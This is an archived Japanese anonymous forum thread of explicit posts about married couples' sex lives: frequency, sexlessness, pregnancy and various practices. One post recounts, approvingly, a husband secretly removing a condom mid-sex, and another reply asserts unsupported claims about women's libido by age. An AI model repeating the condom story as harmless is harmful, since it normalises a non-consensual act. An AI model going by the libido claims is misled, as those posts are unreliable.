独身時代は、妻の方から誘惑してきたり、
積極的だったのだが。
新婚一年未満のいま、
仲は悪いわけではなく、むしろいいのかも知れないが、
性に関しては本当に不満が募る。
回数も減ったし、拒否される事も多くなった
エッチ以外でこちらを射精させる手段もない
これで、時たまあるエッチで妊娠したら、
よりレスになるんだろうなと鬱。
人生を歩むパートナーとしては非常にありがたいのだが、
やはり性は別物なのかね。
なんなら外注を復活させようかとすら思ってしまう。
アラフォーの自分としては、
あとどのくらい自分が男性として機能するか、本当に不安だしね…
8年付き合って会えば必ずエッチ、1週間以上の海外旅行なんかも既に数回一緒に行ったけど
結婚して長男ができる一年くらいは、毎晩毎朝のように旦那は求めてきたよ。
「奥さ〜ん、ボクの奥さ〜ん」て嬉しそうにしてたから
結婚したこと自体が旦那には凄く刺激的だったに違いない。
お互いの体の事隅々まで知っていても、新生活開始によって感覚がリフレッシュされたんだろう。
そういうの、女の私の方があまり感じられなかったから、男性ってロマンチストなんだなと驚いたわ。
でもただ旦那の性欲が強目だっただけという気も…
>>334
あれ、うちの妻がここに…と思うくらい同じようなシチュw
うちもそれほど長くはないけど、
数年の交際と、一年ほどの同棲を経ての結婚でした。
式を挙げたその日から、前述の誓いもあったので、こちらが積極的に
なったのは確かだと思うけど…
数日前、妻と知り合う前の妻のブログ(いまは更新してない)を
発見、元カレについて書いているのを読んで、
自分が嫉妬してる事に驚いた。
自分の性欲が強すぎるだけなのかな。
正直、留守中に自分で処理したりもしてるのだけど、
やっぱり寂しい。 結婚して半年
最近なぜか私が濡れにくくなったみたい
挿入すれば濡れるというか溢れるんだけどなあ 私は毎日でもしたいのに、現実は週1回あればいい方。
主人は寝るのが早くて夜はいつも寂しくて泣きそうです。 新婚さんが使うバイブにも、フライホイールって入ってるの? 新婚時代か、懐かしいなw
コンドームを1日1個以上のペースで消費して、思い切って買ったグロスの箱を3カ月ちょっとで空にしてしまったことを思い出したw
それでも嫁さんの意識としては、新婚当時もそんなにガツガツSEXした感覚はないらしい。ちょっと前に↑の話をしたら驚いてた。
まあ、それだけやりまくることがごく自然なことだったと思えば、悪い気はしないけどな。
二人とも40目前の今も、週に4〜5回はするけど。
もうPC済みだからコンドームは要らないけどね。 結婚2年目子供は一人。
付き合ったのを含めたら3年半、知り合って5年かな・・・?
基本毎日してると思います。
できない日でもフェラか手でしてあげます。
よっぽど旦那が眠そうな時や疲れてる時はしないです。
(触ってみてすぐふにゃあっとなっちゃう時とか、反応が薄い時など)
旦那は24で私は26です。
私の性欲のほうがうんと強そう!内緒で昼間2回くらい一人でしちゃいます。
おかずは旦那です。性欲おかしいかな・・・
結婚1年、生理の時を休んで毎日1発、続けてきたが、最近体がだるくなってきた。
嫁はそうでもないようだが、男はある程度休息しないとだめかなと思っている。 結婚二年目付き合って五年目で週3回くらいでしてるけど
奥さんが入れてから3分くらいでイッてしまって、一回いったらもう出来ないたちなので少し不満
前戯もイッてしまうからと言って15分以上は出来ないし、SEXにかける時間は毎回15分かかるかかからないかくらい
俺もコントロールして奥さんがイクのと同時に出せるからある程度の満足はしてるけどさ・・・ 新婚2ヶ月平日2回週末3回。生理の間は背中マッサージと交換でスペシャルリップサービス
知り合った3年前には一日最大7回できたのに、先先日挑戦したら6回しかできなかった。
衰えたんだから仕方ないと旦那28歳はいうけれど、愛が減ったのかも。 >348
アホかwww
俺だって20代の頃は一晩で8回もやったことがあった
チンコも赤くなってヒリヒリで大変な思いをした事があるがアラフォーの今は一晩で2回も出来ればいい方だ
年をとればそれなりに衰える
愛が減った?それはお前自身じゃないのか?
>>349
そうだ
もっと言ったれ
もっっと旦那を労ったれよ
ホントに新婚の時は、したなあ。
朝起きがけさわってるうちに盛り上がってやっちゃう。
会社から帰って飯食って風呂はいって、またやる。
ほぼ毎日だった。
子供できた途端に激減。
今じゃレス気味だよ。 今年の1月に結婚、ペースは月2。
旦那は私の胸などを触って勃起しつつもそれ以上の事はしてこない。
こちらから攻めようとするとやんわりと断られる。
なんか辛い。
せめて週2はしたいと伝えるも、笑ってごまかされる。 あなたたち初婚ではないですね。若くないのならやむを得ないでしょう。 俺41嫁43、娘20だが新婚と変わりない。週4 生理日はフェラでゴックンしてくれる。娘と歩いていると姉妹に間違えられる自慢の嫁です。 俺のワンパターンセックスに嫁が飽きてきた。最近いろいろ指図してくる。
前戯をはじめると嫁がいろんな事してって言う。一通りはしてるのだが物足らないみたいだ。
もっとベロベロ舐めてとか・・・。正直疲れる。
嫁は長く気持ちいいみたいだけど、俺はあっという間に終わりで最近フェラだけしてくれたら
もう満足なのに・・・。勘弁してほしい。 >>360
それは、ないな! 嫁の方がスタイルいいし若いのはダメだ! 旦那が性欲弱いのか
結婚して約1ヶ月でエッチは1回だけ…
しかも真性包茎orz >>364 これから自分好みのダンナに仕上げればいいじゃん
まずはミニスカ・Nーパンで帰宅を待ってるとか
読めが自分好みに仕上げてあるからフマンは無いな、ウチは >>364
信じられん、1回だけはちゃんと出来たのかね? >>364は結婚するまで今の旦那さんとはしなかったのか、結婚して突然しなくなったのか? 39歳です。
縁あって先月26歳の嫁さんを迎えました。
子作り真っ最中、毎晩中出しオンリー。
外に出すと嫁さんに大目玉を喰らいます(笑)! 俺34歳、男ですが。
俺だって結婚したい w
平日の昼間から2chやってる俺の嫁になってくれる若い女いるかね ww 夫がしてくれません。
つきあい始めは会うたびだったのがだんだん減って月1くらいになり。
1年交際後、結婚。
結婚が決まったときからレスになりました。
初夜もなし、新婚旅行中もなし。
半年で1回もありません。
月1だったこと考えるとより減ったのかな?くらいにしか思ってなかったけど
先日、パソコンにエロ画像発見・・・
ショックすぎる。
私46歳妻42歳の初婚組み合わせ夫婦です。
いろいろあって子は諦めてますが、セックスは
毎日楽しんでいます。 朝からクンニした。クリで三回ぐらい逝かせチンコで三回ぐらい逝かせました。キッチンで立ちバック! 私30主人45の新婚ですが毎日朝晩楽しんでます
私も主人が外に出すと怒りますw
家庭内セックスがこんなに楽しいと思いませんでした @挿入から発射までの時間が長くて1日1回だけやれるの。
A(発射までの所要時間はともかく)1日の挿入(発射)回数が多いの。
どっちが重要? >>378
無論@
Aの場合、俺らの場合は単調なセックスになるだけだな。
1回1回挿入するごとに挿入や射精する行為に飽きてくる。 風呂上りに裸でいると、
すきあらば背後から近づき、
股間から金玉握ってくる嫁w
こんな女だったのかと思うけど、
楽しい新婚生活♪
子供ができるのも、そろそろかなww
変わったプレイ楽しんでたら教えて!
@奥さんに制服着させたり
A奥さんの指を自分のアナルに挿入したり
B奥さんのウンコ食べたり ずっと不思議に思ってたんだけど、女って性欲アンの?
夫のアソコさわりたいとか純粋にエロイ気持ちだけでエッチしたいとか思ったりすんの?
女って何考えてんのか分からない 女性に伺います。
夫や彼がスカート着用のままペッティング・クンニする事はありますか?
ほとんど毎日、スカートの中に手を入れてパンストの上から股間を愛撫されられると言う方はいますか?
その様な方は付き合ってからどれ位から着衣ペッティング・クンニは許されたのでしょうか?
本心は止めて欲しいですか?
私は独身・童貞です。イケ面でウエイトトレは続けています。カッコ良い・素敵・綺麗
光り輝いている・精悍と女性に言われます。童貞とは誰も思いません。
着衣ペッティング・クンニに憧れています。
街で良い女がいても指一本触れる事もまして幼稚園時より憧れていたスカート
の中を拝む事も許されません。着衣ペッティング・クンニが思う存分出来てこそ自分の女・
自分の物にした気がすると思っています。
>>383
お前、完全に被爆したな。1万ミリマイクロシーベルトの放射能浴びたな! もうすぐ結婚一年だけど、月2〜3だなぁ。
同棲期間長かったから、結婚してもこのペース。
旦那28私21ね。
前から旦那が淡泊だった。
週2回とかできる人羨ましい >>385
もし俺が21歳の奥さん貰えたなら毎日2〜3回はHする >>388
3連休10回!
1日目 朝1回 昼過ぎ二回目 晩に3回目
2日目 朝1回 昼過ぎ二回目 夕方3回目 夜中4回目
3日目 朝1回 昼2回目 晩3回目! 毎日嫁27にお風呂の洗い場で、泡踊りしてもらっている・・・マイソープ嬢。
お風呂上り嫁は、黒か薄いピンクのベビードールとTバック。
疲れてる時はその嫁姿がプレッシャーだ。
結婚してから一度も自分で体洗ってない・・・全部洗ってくれる嫁。
髪の毛だけは自分でシャンプーしてる。 うちは双子&絶対安静だったから、妊娠中はおろか
産後も1年半はなかった
つーか乳児二人だとセクースなどする暇なし。
ようやく子らが断乳したあたりから再開したなー >>390
嫁さんは元風嬢だけに洗い方は抜群です。
ただ現役風嬢と違うのは、男(つまり私)が
満足させねばならないということ。
惚れた弱みですな(^^ゞ 食欲、睡眠欲、性欲、この3つは抑えようがない。
震災避難所には新婚さんの為の、時間貸し制の個室を確保してあげたい。 付き合ってる頃は会えばエッチしたのに
一緒になってからはやる気が起きなくなった 結婚してからの夫婦生活を充実させるためにも、婚前交渉は控えた方が良いのか? うちの旦那さんは洗い物とかキッチン仕事をしていると後ろからイタズラしにくるのが日課になっています 私は朝旦那
さんのをイタズラするのが日課です
結婚一年目、まだまだ仲良しです なの
に今度の震災で四日前から出張に…
期間未定とか寂しすぎる〜 >>396
夢だね。うらやましいね。
大胆さが素人とは違うよね。 結婚して2ヶ月まだ1回もしてません><
もちろん結婚前も
嫁がレズだったorz ウチの部署に職場結婚した27歳の夫婦いるけど、こないだ飲み会で新郎が「これからアイツとエッチなんで二次会は失礼します」って帰っていった。
薬局閉まってるから、近藤さんはコンビニで買ってくって奥さんに電話してた。 >>410
そんなこと一々言わなくてもいいのにね。
っていうか、言わないで欲しい。
旦那の会社の人と会う機会があったら気まずいじゃん。 休日の一回戦終わり
朝10時から、書斎のパソコンでエロ動画の音声だけ聴かせつつ、立ちバック
夫婦の休みの日のセックスの決まりは、イカない
イカずに途中でやめて、イッてないからまたしたくなって、また途中でやめて…ってエンドレスでやり続ける
3月に結婚しましたが、毎日のように迫られて苦痛です。
アソコが臭くて臭くて気持ち悪くなるのです。本当に臭いです。 うちの嫁は男は絶対浮気すると思ってまして、と言うのも買い物行って可愛い子を
見ただけで浮気心があるとか言って怒る始末。毎日携帯のチェックもありの男友達
と会うのも事細かく説明しないと出かけられません。結婚してから毎朝フェラで抜かれ
る様になり、この頃は絶頂で目が覚めることが多くなってきています。そんな毎日出したく
もないんだけど心配しすぎの嫁が日課にしているんです。最初は良かったんですが。。。 >>419
今のうちに楽しんでおけよ。
そのうち、何も起こらなくなるから。 生涯独身で貫くつもりだったけど今の嫁さんと出会って良かったわ。
一緒に居て楽しいし美人だし幸せだわ。
この前なんて仕事行くのに愛妻弁当なんて言う物作ってもらったりして、嬉しいけど照れるもんだね。
妊娠してる身なんだから俺の心配より自分の心配をしろよと、嬉しいけどコッチが心配になるわ。
真剣な顔して小沢一郎氏のニュースを見ている嫁に意味分かってんの?って質問したら軽くパニックになってた嫁が何故か凄く可愛くて愛おしいと思えた。
生理明け(完全に終わってないが)の嫁とのH、一週間ぶりだったから無茶苦茶気持ち良かった
嫁も凄く感じてくれて、つい「○○のオ○ンチンが凄い気持ちいい」って言わせてしまった
そうしたら俺も興奮して硬くなり、嫁ももっと喘ぐ…
最高だよ
愛してるよ、△△ 大丈夫!! 俺たち夫婦は新婚当時一日二回毎日していたけど25年経った今でも
現役だよ。・・・・回数は週二回に減ったけどorz 凄い…
俺は新婚当時は当然、毎日2発だったけど、
2人目の子が生まれてから15年以上1回もナシ
子供がいることもあるが、やり過ぎでもういいや感もある 式から2か月たたないで赤ちゃんできた…
バックになる時にこっそりゴム取ってたことがあったらしくかったけど夢中で私も気づかなかった
今日は記念日
これから愛し合います
昨日は中折れだったから、今日こそは… うちは新婚だが年の差があって嫁の体力と欲求について行けない・・・ >>430
わかる
わかる
私も嫁と年の差30なので
最近は「貸し出し」をしています アレの日以外、毎日頑張ってますよ
23歳でまだ幼いところもあるんだけど、同い年の嫁友達と比べたらやっぱり人妻らしい
結婚して半年だけど、もう一ヶ月もしてないなー
女は30になってから性欲でるんじゃなかったのか? 結婚して一緒に暮らす際に色々ルール決めしました
その時にマイホームの頭金の貯金が貯まるまで子供は作らないというのを嫁が言い出して
私は、セックスの回数は週2回したくて、全部中出ししたいのでピル飲んでね、
というのを要求したら、処女だった嫁はものすごく嫌々だったのですが了承しました
しかし、半年もして嫁も快感を覚えてくると1回戦終わった後に、ずっと抱きしめられて
2回戦を当たり前のように要求してくるようになりました
今の体力だと何とか3回戦までいけるのですが、体調にもよります
1日あたり何回の射精までと決めなかったのは不覚でした
>>436
おまいさん気に入ったw
こっちおいでよ
ttp://kamome.2ch.net/test/read.cgi/ex/1320740731/ 結婚3ヶ月。嫁は前は「性欲強くない」って言ってたのに、ここ最近は隙あらば寄って来る。
「どんどん良くなってるから///」って言われても、仕事終わりはやっぱしんどいわー スレチかもですが...
39と34歳の再婚同士、週5です
旦那さんが大好きだからどんなパーツでも舐めちゃってますw
>>436
スレチだけど、俺は建築関係の仕事してるけど、これってかなり重要だよ
家買ってから、子供出来て、ローンのために共働きを・・・という順の家庭は大抵仲が悪いね
子供出来て、家買ってっていう順でも一緒
俺40嫁27だけど、何で結婚してくれたの?って嫁に聞いたら
この世に結婚というシステムがあるので一度はしてみたかっけど、
子づくりとローン関係、両方で苦労するのは受け入れられないって言われたもの
ああ、朝飯作ってる音がする。昨日3回戦したのにタフだなー 新婚三ヶ月で妊娠二ヶ月
もちろん妊娠中は性欲湧かないからレス
妊娠のストレスばかりが貯まり2人とも喧嘩腰
新婚旅行も行けなかったし新婚気分なんてゼロ
どうして一緒に住んでるかさえわからないし楽しくない生活にうんざり >>435
それ嘘だぞ!
女も普通に10代〜20前半が最も性欲強くて、遊びまくった後は性欲なんてないから、
30でストレスない女なんて性欲の欠片もない人多いんだよ。
逆に旦那にストレス持ってる人とかは不倫でストレス発散するから30代から
性欲強くなるとかって言う誤認した調査のデマが流布しているのだ。 >>417
これは夫の意見だな!
男のちんこは臭わない。嫁がくさまーんで辛いんだろうな… ■ このスレッドは過去ログ倉庫に格納されています